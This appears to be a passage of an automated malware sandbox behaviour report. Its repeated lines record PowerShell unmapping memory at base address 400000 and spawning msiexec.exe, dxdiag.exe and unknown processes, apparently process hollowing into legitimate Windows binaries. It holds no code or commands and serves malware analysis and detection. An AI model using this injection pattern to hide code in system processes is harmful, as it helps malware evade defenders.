Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
